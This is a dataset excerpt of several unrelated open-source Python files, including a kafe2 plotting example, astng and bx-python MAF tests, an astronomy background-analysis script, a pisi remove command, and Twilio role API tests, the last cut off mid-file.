repo_name
stringlengths 5
100
| path
stringlengths 4
299
| copies
stringclasses 990
values | size
stringlengths 4
7
| content
stringlengths 666
1.03M
| license
stringclasses 15
values | hash
int64 -9,223,351,895,964,839,000
9,223,297,778B
| line_mean
float64 3.17
100
| line_max
int64 7
1k
| alpha_frac
float64 0.25
0.98
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
dsavoiu/kafe2 | examples/005_convenience/customize.py | 1 | 4059 | """
kafe2 example: Plot Customization
=================================
This example is a cheat sheet for plot/report customization.
It briefly demonstrates methods that modify the optics of kafe2 output.
"""
from kafe2 import XYContainer, Fit, Plot
import matplotlib.pyplot as plt
# The same setup as in 001_line_fit/line_fit.py :
xy_data = XYContainer(x_data=[1.0, 2.0, 3.0, 4.0],
y_data=[2.3, 4.2, 7.5, 9.4])
xy_data.add_error(axis='x', err_val=0.1)
xy_data.add_error(axis='y', err_val=0.4)
line_fit = Fit(data=xy_data)
line_fit.do_fit()
# Non-LaTeX names are used in reports and other text-based output:
line_fit.assign_parameter_names(x='t', a='alpha', b='beta')
line_fit.assign_model_function_expression('theta')
line_fit.assign_model_function_expression("{a} * {x} + {b}")
# Note: the model function expression is formatted as a Python string.
# The names of parameters in curly brackets will be replaced with the specified latex names.
# You could also just hard-code the parameter names like this:
# line_fit.assign_model_function_expression("alpha * t + beta")
line_fit.report()
# LaTeX names are used in plot info boxes:
line_fit.assign_parameter_latex_names(x='t', a='\\alpha', b='\\beta')
line_fit.assign_model_function_latex_name('\\theta')
line_fit.assign_model_function_latex_expression('{a} \\cdot {x} + {b}')
# Labels can be set for a fit.
# These labels are then used by all Plots created from said fit.
# If a Plot object also defines labels those labels override the fit labels.
# The labels displayed in the info box:
line_fit.data_container.label = "My data label"
line_fit.model_label = "My model label"
# The labels displayed on the x/y axes:
line_fit.data_container.axis_labels = ["My x axis", "My y axis"]
plot = Plot(fit_objects=line_fit)
# Plot objects can be modified with the customize method which sets matplotlib keywords.
# The first argument specifies the subplot for which to set keywords.
# The second argument specifies which keyword to set.
# The third argument is a list of values to set for the keyword for each fit managed
# by the plot object.
plot.customize('data', 'label', ["My data label 2"]) # Overwrite data label in info box.
# plot.customize('data', 'label', [None]) # Hide data label in info box.
plot.customize('data', 'marker', ['o']) # Set the data marker shape in the plot.
plot.customize('data', 'markersize', [5]) # Set the data marker size in the plot.
plot.customize('data', 'color', ['blue']) # Set the data marker color in the plot.
plot.customize('data', 'ecolor', ['gray']) # Set the data errorbar color in the plot.
plot.customize('model_line', 'label', ['My model label 2']) # Set the model label in the info box.
# plot.customize('model_line', 'label', [None]) # Hide the model label in the info box.
plot.customize('model_line', 'color', ['lightgreen']) # Set the model line color in the plot.
plot.customize('model_line', 'linestyle', ['-']) # Set the style of the model line in the plot.
plot.customize('model_error_band', 'label', [r'$\pm 1 \sigma$']) # Error band label in info box.
# plot.customize('model_error_band', 'label', [None]) # Hide error band label.
plot.customize('model_error_band', 'color', ['lightgreen']) # Error band color in plot.
# plot.customize('model_error_band', 'hide', [True]) # Hide error band in plot and info box.
# Available keywords can be retrieved with Plot.get_keywords(subplot_type) .
# subplot_type is for example 'data', 'model_line', or 'model_error_band'.
# In addition to the customize method Plot has a few convenience methods for common operations:
plot.x_range = (0.8, 6) # Set the x range of the plot.
plot.y_range = (1, 11) # Set the y range of the plot.
plot.x_label = 'My x axis 2' # Overwrite the label of the x axis.
plot.y_label = 'My y axis 2' # Overwrite the label of the y axis.
plot.x_scale = 'log' # Set the x axis to a logarithmic scale.
plot.y_scale = 'log' # Set the y axis to a logarithmic scale.
# Finally, perform the plot:
plot.plot(ratio=True)
plt.show()
| gpl-3.0 | 5,711,633,710,796,409,000 | 45.125 | 99 | 0.698448 | false |
tkaitchuck/nupic | external/common/lib/python2.6/site-packages/logilab/astng/test/unittest_regrtest.py | 1 | 5380 | # copyright 2003-2011 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:[email protected]
# copyright 2003-2010 Sylvain Thenault, all rights reserved.
# contact mailto:[email protected]
#
# This file is part of logilab-astng.
#
# logilab-astng is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# logilab-astng is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with logilab-astng. If not, see <http://www.gnu.org/licenses/>.
from logilab.common.testlib import unittest_main, TestCase
from logilab.astng import ResolveError, MANAGER, Instance, nodes, YES, InferenceError
from logilab.astng.builder import ASTNGBuilder
from logilab.astng.raw_building import build_module
from logilab.astng.manager import ASTNGManager
import sys
from os.path import join, abspath, dirname
class NonRegressionTC(TestCase):
def setUp(self):
sys.path.insert(0, join(dirname(abspath(__file__)), 'regrtest_data'))
def tearDown(self):
sys.path.pop(0)
def brainless_manager(self):
manager = ASTNGManager()
# avoid caching into the ASTNGManager borg since we get problems
# with other tests :
manager.__dict__ = {}
manager.astng_cache = {}
manager._mod_file_cache = {}
manager.transformers = {}
return manager
def test_module_path(self):
man = self.brainless_manager()
mod = man.astng_from_module_name('package.import_package_subpackage_module')
package = mod.igetattr('package').next()
self.failUnlessEqual(package.name, 'package')
subpackage = package.igetattr('subpackage').next()
self.assertIsInstance(subpackage, nodes.Module)
self.assertTrue(subpackage.package)
self.failUnlessEqual(subpackage.name, 'package.subpackage')
module = subpackage.igetattr('module').next()
self.failUnlessEqual(module.name, 'package.subpackage.module')
def test_package_sidepackage(self):
manager = self.brainless_manager()
assert 'package.sidepackage' not in MANAGER.astng_cache
package = manager.astng_from_module_name('absimp')
self.assertIsInstance(package, nodes.Module)
self.assertTrue(package.package)
subpackage = package.getattr('sidepackage')[0].infer().next()
self.assertIsInstance(subpackage, nodes.Module)
self.assertTrue(subpackage.package)
self.failUnlessEqual(subpackage.name, 'absimp.sidepackage')
def test_living_property(self):
builder = ASTNGBuilder()
builder._done = {}
builder._module = sys.modules[__name__]
builder.object_build(build_module('module_name', ''), Whatever)
def test_new_style_class_detection(self):
try:
import pygtk
except ImportError:
self.skipTest('test skipped: pygtk is not available')
# XXX may fail on some pygtk version, because objects in
# gobject._gobject have __module__ set to gobject :(
builder = ASTNGBuilder()
data = """
import pygtk
pygtk.require("2.6")
import gobject
class A(gobject.GObject):
pass
"""
astng = builder.string_build(data, __name__, __file__)
a = astng['A']
self.failUnless(a.newstyle)
def test_pylint_config_attr(self):
try:
from pylint import lint
except ImportError:
self.skipTest('pylint not available')
mod = MANAGER.astng_from_module_name('pylint.lint')
pylinter = mod['PyLinter']
expect = ['OptionsManagerMixIn', 'object', 'MessagesHandlerMixIn',
'ReportsHandlerMixIn', 'BaseRawChecker', 'BaseChecker',
'OptionsProviderMixIn', 'ASTWalker']
self.assertListEqual([c.name for c in pylinter.ancestors()],
expect)
self.assert_(list(Instance(pylinter).getattr('config')))
infered = list(Instance(pylinter).igetattr('config'))
self.assertEqual(len(infered), 1)
self.assertEqual(infered[0].root().name, 'optparse')
self.assertEqual(infered[0].name, 'Values')
def test_numpy_crash(self):
"""test don't crash on numpy"""
#a crash occured somewhere in the past, and an
# InferenceError instead of a crash was better, but now we even infer!
try:
import numpy
except ImportError:
self.skipTest('test skipped: numpy is not available')
builder = ASTNGBuilder()
data = """
from numpy import multiply
multiply(1, 2, 3)
"""
astng = builder.string_build(data, __name__, __file__)
callfunc = astng.body[1].value.func
infered = callfunc.infered()
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], Instance)
class Whatever(object):
a = property(lambda x: x, lambda x: x)
if __name__ == '__main__':
unittest_main()
| gpl-3.0 | -6,657,232,164,024,697,000 | 36.103448 | 85 | 0.659851 | false |
jmontgom10/Mimir_pyPol | oldCode/04a_analyzeBackgroundLevels.py | 1 | 9158 | import os
import sys
import subprocess
import datetime
import numpy as np
from astropy.io import ascii
from astropy.table import Table, Column, vstack
from astropy.wcs import WCS
from astropy.wcs.utils import proj_plane_pixel_scales
from astropy.coordinates import SkyCoord, ICRS
from astropy.stats import gaussian_fwhm_to_sigma, sigma_clipped_stats
from scipy.stats import norm, f
from scipy.odr import *
from scipy.optimize import minimize
from scipy.ndimage.filters import median_filter, gaussian_filter1d
from photutils import detect_sources, Background
# For debugging
import matplotlib.pyplot as plt
# Add the AstroImage class
import astroimage as ai
# Add the header handler to the BaseImage class
from Mimir_header_handler import Mimir_header_handler
ai.reduced.ReducedScience.set_header_handler(Mimir_header_handler)
ai.set_instrument('mimir')
# This script will read in the background level estimated for each on-target
# image in the previous step. The background level in dimmest parts of the
# on-target image will be directly computed, and the residual between the direct
# estimate and the interpolation will be stored. The distribution of these
# residual will be used to estimate which interpolated background levels can be
# trusted.
#==============================================================================
# *********************** CUSTOM USER CODE ************************************
# this is where the user specifies where the raw data is stored
# and some of the subdirectory structure to find the actual .FITS images
#==============================================================================
# This is the location of all PPOL reduction directory
PPOL_dir = 'C:\\Users\\Jordan\\FITS_data\\Mimir_data\\PPOL_reduced'
# Build the path to the S3_Asotremtry files
S3dir = os.path.join(PPOL_dir, 'S3_Astrometry')
# This is the location where all pyPol data will be saved
pyPol_data = 'C:\\Users\\Jordan\\FITS_data\\Mimir_data\\pyPol_data'
# This is the directory where the 2MASS tiles of the targets have been saved
# Go to "http://hachi.ipac.caltech.edu/" to download 2MASS tiles
TMASSdir = "C:\\Users\\Jordan\\Libraries\\python\\Mimir_pyPol\\2MASSimages"
# Setup new directory for background subtracted data
bkgSubDir = os.path.join(pyPol_data, 'bkgSubtracted')
if (not os.path.isdir(bkgSubDir)):
os.mkdir(bkgSubDir, 0o755)
# Read in Kokopelli mask generated in previous step
kokopelliMask = (AstroImage('kokopelliMask.fits').arr != 0)
# Read in the indexFile data and select the filenames
indexFile = os.path.join(pyPol_data, 'reducedFileIndex.csv')
fileIndex = Table.read(indexFile, format='csv')
# Grab the file basenames for later use
fileIndexFileNames = np.array([os.path.basename(file1)
for file1 in fileIndex['Filename'].data])
# Modify the fileIndex to include rejections by residual value
if 'Background Cut' not in fileIndex.keys():
fileIndex.add_column(Column(name='Background Cut',
data = np.repeat(0, len(fileIndex))))
# Determine which parts of the fileIndex pertain to science images
useFiles = np.where(np.logical_and(fileIndex['Use'].data == 1,
fileIndex['Background'].data >= 0))
skipFiles = np.where(np.logical_or(fileIndex['Use'].data == 0,
fileIndex['Background'].data < 0))
# Cull the file index to only include files selected for use
fileIndex1 = fileIndex[useFiles]
fileIndex2 = fileIndex[skipFiles]
# Group files by target and waveband
groupFileIndex = fileIndex1.group_by(['PPOL Name'])
allFileList = []
allResidualList = []
# Loop through all the usable images and comute their residuals
for group in groupFileIndex.groups:
# Grab the current target information
thisTarget = str(np.unique(group['Target'].data)[0])
thisWaveband = str(np.unique(group['Waveband'].data)[0])
thisPPOLname = str(np.unique(group['PPOL Name'].data)[0])
# if thisPPOLname != 'NGC2023_H3': continue
print('\nProcessing images for')
print('\tPPOL Group : {0}'.format(thisPPOLname))
print('')
# Read in the 2MASS image
TMASSfile = os.path.join(TMASSdir, '_'.join([thisTarget, thisWaveband]) + '.fits')
TMASSimg = AstroImage(TMASSfile)
TMASSwcs = WCS(TMASSimg.header)
# Estimate the "nebula free" level
mean, median, stddev = sigma_clipped_stats(TMASSimg.arr.flatten())
bkgThresh = median - 0.5*stddev
# Find the "nebula free" pixels
bkgRegion = TMASSimg.arr < bkgThresh
neighborCount = np.zeros_like(bkgRegion, dtype=int)
for dx in range(-1,2):
for dy in range(-1,2):
neighborCount += np.roll(np.roll(bkgRegion, dy, axis = 0), dx, axis = 1)
# Find pixels with at least 3 neighbors (other than self)
bkgRegion = neighborCount > 4
groupFileList = []
groupResidualList = []
for file1, interpBkg in zip(group['Filename'].data, group['Background'].data):
# Read in this image.
img = AstroImage(file1)
# See which pixels in this image map to background pixels
ny, nx = img.arr.shape
yy, xx = np.mgrid[0:ny, 0:nx]
wcs = WCS(img.header)
RAs, Decs = wcs.wcs_pix2world(xx, yy, 0)
Tx, Ty = TMASSwcs.wcs_world2pix(RAs, Decs, 0)
Tx, Ty = (Tx.round()).astype(int), (Ty.round()).astype(int)
# Grab the value of the TMASS background mask for each pixel
MimirBkgRegion = bkgRegion[Ty, Tx]
# Get the indices of the background pixel
bkgInds = np.where(MimirBkgRegion)
bkgVals = img.arr[bkgInds]
# Compute the direct estimate of background level
mean, median, stddev = sigma_clipped_stats(bkgVals)
# Compute the residual level and store it in the list
thisResidual = mean - interpBkg
groupFileList.append(os.path.basename(file1))
groupResidualList.append(thisResidual)
# Place this residual list in the final total residual list
allFileList.extend(groupFileList)
allResidualList.extend(groupResidualList)
# Convert the lists to arrays
groupFileList = np.array(groupFileList)
groupResidualList = np.array(groupResidualList)
# Check for outliers and mark residuals 5-sigma outside this group's median
mean, median, stddev = sigma_clipped_stats(groupResidualList)
residMin, residMax = mean - 5*stddev, mean + 5*stddev
badInds = np.where(np.logical_or(groupResidualList < residMin,
groupResidualList > residMax))
# If some of these residuals are more than 5-sigma from the group mean, then
# mark them as bad background levels in the file index.
if len(badInds[0]) > 0:
# Select the file names of the bad backgrounds
badFiles = groupFileList[badInds]
# Grab the indices of these files in the fileIndex and mark them as bad
fileIndexInds = np.array([np.where(fileIndexFileNames == file1)[0][0]
for file1 in badFiles])
fileIndex['Background Cut'][fileIndexInds] = 1
# Convert the lists to arrays
allFileList = np.array(allFileList)
allResidualList = np.array(allResidualList)
# Now that we have the residuals for each group, plot them up as histograms
# # Start by parsing out the residuals for each group
# Now create a plot with all groups clumpped together
fig2 = plt.figure()
ax2 = fig2.add_subplot(1,1,1)
ax2.hist(allResidualList, 10, normed=1, histtype='stepfilled', stacked=True)
plt.xlabel('Residual Counts')
plt.ylabel('Fraction of Fields')
# Prepare some statistical comments
xmin, xmax = ax2.get_xlim()
ymin, ymax = ax2.get_ylim()
mean, median, stddev = sigma_clipped_stats(allResidualList)
# Mark the mean
ax2.axvline(mean, color='k', linewidth=2.0)
ax2.text(mean+0.02*(xmax-xmin), 0.95*ymax, 'mean', rotation='vertical')
# Mark the median
ax2.axvline(median, color='k', linewidth=2.0)
ax2.text(median-0.04*(xmax-xmin), 0.95*ymax, 'median', rotation='vertical')
# Mark the 3-sigma upper and lower limits
ax2.axvline(median - 5*stddev, color='k', linewidth=2.0)
ax2.axvline(median + 5*stddev, color='k', linewidth=2.0)
# Prepare the limits of the acceptable residual range
residMin, residMax = mean - 5*stddev, mean + 5*stddev
# Find any background levels that are outside the 5-sigma limits
badInds = np.where(np.logical_or(allResidualList < residMin,
allResidualList > residMax))
# If some of these residuals are more than 5-sigma from the group mean, then
# mark them as bad background levels in the file index.
if len(badInds[0]) > 0:
# Select the file names of the bad backgrounds
badFiles = allFileList[badInds]
# Grab the indices of these files in the fileIndex and mark them as bad
fileIndexInds = np.array([np.where(fileIndexFileNames == file1)[0][0]
for file1 in badFiles])
fileIndex['Background Cut'][fileIndexInds] = 1
# Then save to disk
print('*************************************')
print('Writing all background levels to disk')
print('*************************************')
pdb.set_trace()
fileIndex.write(indexFile, format='csv')
print('Done!')
| mit | -186,222,741,989,341,950 | 37.478992 | 86 | 0.683009 | false |
SolusOS-discontinued/pisi | pisi/cli/remove.py | 2 | 2076 | # -*- coding:utf-8 -*-
#
# Copyright (C) 2005 - 2007, TUBITAK/UEKAE
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 2 of the License, or (at your option)
# any later version.
#
# Please read the COPYING file.
#
import optparse
import gettext
__trans = gettext.translation('pisi', fallback=True)
_ = __trans.ugettext
import pisi.cli.command as command
import pisi.context as ctx
import pisi.api
import pisi.db
class Remove(command.PackageOp):
__doc__ = _("""Remove PiSi packages
Usage: remove <package1> <package2> ... <packagen>
Remove package(s) from your system. Just give the package names to remove.
You can also specify components instead of package names, which will be
expanded to package names.
""")
__metaclass__ = command.autocommand
def __init__(self, args):
super(Remove, self).__init__(args)
self.componentdb = pisi.db.componentdb.ComponentDB()
name = ("remove", "rm")
def options(self):
group = optparse.OptionGroup(self.parser, _("remove options"))
super(Remove, self).options(group)
group.add_option("--purge", action="store_true",
default=False, help=_("Removes everything including changed config files of the package"))
group.add_option("-c", "--component", action="append",
default=None, help=_("Remove component's and recursive components' packages"))
self.parser.add_option_group(group)
def run(self):
self.init()
components = ctx.get_option('component')
if not components and not self.args:
self.help()
return
packages = []
if components:
for name in components:
if self.componentdb.has_component(name):
packages.extend(self.componentdb.get_union_packages(name, walk=True))
packages.extend(self.args)
pisi.api.remove(packages)
| gpl-2.0 | 588,452,316,152,080,900 | 29.985075 | 111 | 0.644509 | false |
bxlab/HiFive_Paper | Scripts/HiCLib/bx-python-0.7.1/build/lib.linux-x86_64-2.7/bx/align/maf_tests.py | 7 | 8301 | """
Tests for `bx.align.maf`.
"""
import unittest
import sys
import bx.align as align
import bx.align.maf as maf
from StringIO import StringIO
# A simple MAF from the rat paper days
test_maf = """##maf version=1 scoring=humor.v4
# humor.v4 R=30 M=10 /cluster/data/hg15/bed/blastz.mm3/axtNet300/chr1.maf
# /cluster/data/hg15/bed/blastz.rn3/axtNet300/chr1.maf
a score=0.128
s human_hoxa 100 8 + 100257 ACA-TTACT
s horse_hoxa 120 9 - 98892 ACAATTGCT
s fugu_hoxa 88 7 + 90788 ACA--TGCT
a score=0.071
s human_unc 9077 8 + 10998 ACAGTATT
# Comment
s horse_unc 4555 6 - 5099 ACA--ATT
s fugu_unc 4000 4 + 4038 AC----TT
"""
# A more complicated MAF with synteny annotation and such
test_maf_2 = """##maf version=1 scoring=autoMZ.v1
a score=3656.000000
s hg17.chr1 2005 34 + 245522847 TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------
s rheMac2.chr11 9625228 31 + 134511895 TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------
i rheMac2.chr11 C 0 I 1678
s panTro1.chr1 2014 34 + 229575298 TGTAACTTAATACCACAACCAGGCATGGGGG--AAA-------------
i panTro1.chr1 C 0 C 0
s bosTau2.chr5 64972365 47 + 76426644 TCCAGCCATGTGTTGTGATCAG--CCAGGGGCTAAAGCCATGGCGGTAG
i bosTau2.chr5 C 0 I 1462
s canFam2.chr27 45129665 31 + 48908698 TTTGACTCTGTGCTCTTATCAGGCCCAAGGG------------------
i canFam2.chr27 C 0 I 1664
e danRer3.chr18 2360867 428 + 50308305 I
e oryCun1.scaffold_139397 643 1271 - 4771 I
e loxAfr1.scaffold_5603 58454 1915 + 68791 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e rn3.chr4 29161032 1524 - 187371129 I
e mm7.chr6 28091695 3290 - 149646834 I
"""
# A MAF to test slicing upon
test_maf_3 = """##maf version=1 scoring=none
a score=0
s apple 34 64 + 110 AGGGA---GTTCGTCACT------GTCGTAAGGGTTCAGA--CTGTCTATGTATACACAAGTTGTGTTGCA--ACCG
s orange 19 61 - 100 AGGGATGCGTT--TCACTGCTATCGTCGTA----TTCAGACTTCG-CTATCT------GAGTTGT---GCATTACCG
"""
def test_reader():
reader = maf.Reader( StringIO( test_maf ) )
assert reader.attributes["version"] == "1"
assert reader.attributes["scoring"] == "humor.v4"
a = reader.next()
assert a.score == 0.128
assert len( a.components ) == 3
check_component( a.components[0], "human_hoxa", 100, 8, "+", 100257, "ACA-TTACT" )
check_component( a.components[1], "horse_hoxa", 120, 9, "-", 98892, "ACAATTGCT" )
check_component( a.components[2], "fugu_hoxa", 88, 7, "+", 90788, "ACA--TGCT" )
a = reader.next()
assert a.score == 0.071
assert len( a.components ) == 3
check_component( a.components[0], "human_unc", 9077, 8, "+", 10998, "ACAGTATT" )
check_component( a.components[1], "horse_unc", 4555, 6, "-", 5099, "ACA--ATT" )
check_component( a.components[2], "fugu_unc", 4000, 4, "+", 4038, "AC----TT" )
a = reader.next()
assert a is None
reader.close()
def test_writer():
val = StringIO()
writer = maf.Writer( val, { 'scoring':'foobar' } )
a = align.Alignment()
a.score = 7009
a.components.append( align.Component( src="human_hoxa", start=100, size=9, strand="+", src_size=1000257, text="ACA-TTACT" ) )
a.components.append( align.Component( src="horse_hoxa", start=120, size=10, strand="-", src_size=98892, text="ACAATTGCT" ) )
check_component( a.components[0], "human_hoxa", 100, 9, "+", 1000257, "ACA-TTACT" )
check_component( a.components[1], "horse_hoxa", 120, 10, "-", 98892, "ACAATTGCT" )
writer.write( a )
assert val.getvalue() == """##maf version=1 scoring=foobar
a score=7009
s human_hoxa 100 9 + 1000257 ACA-TTACT
s horse_hoxa 120 10 - 98892 ACAATTGCT
"""
def test_slice():
a = align.Alignment()
a.score = "7009"
a.components.append( align.Component( src="human_hoxa", start=100, size=9, strand="+", src_size=100257, text="ACA-TTACT" ) )
a.components.append( align.Component( src="horse_hoxa", start=120, size=10, strand="-", src_size=98892, text="ACAATTGCT" ) )
b = a.slice_by_component( 0, 101, 105 )
check_component( b.components[0], src="human_hoxa", start=101, size=4, strand="+", src_size=100257, text="CA-TT" )
check_component( b.components[1], src="horse_hoxa", start=121, size=5, strand="-", src_size=98892, text ="CAATT" )
# test slicing with + strand src
reader = maf.Reader( StringIO( test_maf_3 ) )
a = reader.next()
b = a.slice_by_component( 0, 40, 62 )
check_component( b.components[0], src="apple", start=40, size=22, strand="+", src_size=110, text="TTCGTCACT------GTCGTAAGGGTTC" )
check_component( b.components[1], src="orange", start=28, size=22, strand="-", src_size=100, text="TT--TCACTGCTATCGTCGTA----TTC" )
# test slicing with - strand src
b = a.slice_by_component( 1, 30, 68 )
check_component( b.components[0], src="apple", start=46, size=41, strand="+", src_size=110, text="ACT------GTCGTAAGGGTTCAGA--CTGTCTATGTATACACAAGTTG" )
check_component( b.components[1], src="orange", start=32, size=38, strand="-", src_size=100, text="ACTGCTATCGTCGTA----TTCAGACTTCG-CTATCT------GAGTTG" )
a = reader.next()
assert a is None
def test_with_synteny():
reader = maf.Reader( StringIO( test_maf_2 ), parse_e_rows=True )
a = reader.next()
check_component( a.components[0], "hg17.chr1", 2005, 34, "+", 245522847, "TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------")
check_component( a.components[1], "rheMac2.chr11", 9625228, 31, "+", 134511895, "TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------")
print a.components[1].synteny_left
assert a.components[1].synteny_left == ( maf.MAF_CONTIG_STATUS, 0 )
assert a.components[1].synteny_right == ( maf.MAF_INSERT_STATUS, 1678 )
rat = a.get_component_by_src_start( "rn3." )
check_component( rat, "rn3.chr4", 29161032, 1524, "-", 187371129, None )
assert rat.synteny_empty == maf.MAF_INSERT_STATUS
def test_write_with_synteny():
reader = maf.Reader( StringIO( test_maf_2 ), parse_e_rows=True )
a = reader.next()
val = StringIO()
writer = maf.Writer( val, { 'scoring':'foobar' } )
writer.write( a )
actual = val.getvalue()
expected = """##maf version=1 scoring=foobar
a score=3656.0
s hg17.chr1 2005 34 + 245522847 TGTAACTTAATACCACAACCAGGCATAGGGG--AAA-------------
s rheMac2.chr11 9625228 31 + 134511895 TGTAACCTCTTACTGCAACAAGGCACAGGGG------------------
i rheMac2.chr11 C 0 I 1678
s panTro1.chr1 2014 34 + 229575298 TGTAACTTAATACCACAACCAGGCATGGGGG--AAA-------------
i panTro1.chr1 C 0 C 0
s bosTau2.chr5 64972365 47 + 76426644 TCCAGCCATGTGTTGTGATCAG--CCAGGGGCTAAAGCCATGGCGGTAG
i bosTau2.chr5 C 0 I 1462
s canFam2.chr27 45129665 31 + 48908698 TTTGACTCTGTGCTCTTATCAGGCCCAAGGG------------------
i canFam2.chr27 C 0 I 1664
e danRer3.chr18 2360867 428 + 50308305 I
e oryCun1.scaffold_139397 643 1271 - 4771 I
e loxAfr1.scaffold_5603 58454 1915 + 68791 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e echTel1.scaffold_212365 4641 1430 + 9822 I
e rn3.chr4 29161032 1524 - 187371129 I
e mm7.chr6 28091695 3290 - 149646834 I
"""
print actual
print "---"
print expected
assert actual == expected
def check_component( c, src, start, size, strand, src_size, text ):
assert c.src == src
assert c.start == start
assert c.size == size
assert c.strand == strand
assert c.src_size == src_size
assert c.text == text | bsd-3-clause | 185,809,693,163,886,140 | 42.694737 | 155 | 0.58511 | false |
twilio/twilio-python | tests/integration/conversations/v1/test_role.py | 1 | 8325 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base import serialize
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class RoleTestCase(IntegrationTestCase):
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles.create(friendly_name="friendly_name", type="conversation", permission=['permission'])
values = {
'FriendlyName': "friendly_name",
'Type': "conversation",
'Permission': serialize.map(['permission'], lambda e: e),
}
self.holodeck.assert_has_request(Request(
'post',
'https://conversations.twilio.com/v1/Roles',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles.create(friendly_name="friendly_name", type="conversation", permission=['permission'])
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(permission=['permission'])
values = {'Permission': serialize.map(['permission'], lambda e: e), }
self.holodeck.assert_has_request(Request(
'post',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
data=values,
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(permission=['permission'])
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://conversations.twilio.com/v1/Roles/RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"chat_service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "Conversation Role",
"type": "conversation",
"permissions": [
"sendMessage",
"leaveConversation",
"editOwnMessage",
"deleteOwnMessage"
],
"date_created": "2016-03-03T19:47:15Z",
"date_updated": "2016-03-03T19:47:15Z",
"url": "https://conversations.twilio.com/v1/Roles/RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
}
'''
))
actual = self.client.conversations.v1.roles("RLXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.conversations.v1.roles.list()
self.holodeck.assert_has_request(Request(
'get',
'https://conversations.twilio.com/v1/Roles',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://conversations.twilio.com/v1/Roles?PageSize=50&Page=0",
"next_page_url": null,
"key": "roles"
},
"roles": [
{
"sid": "RLaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
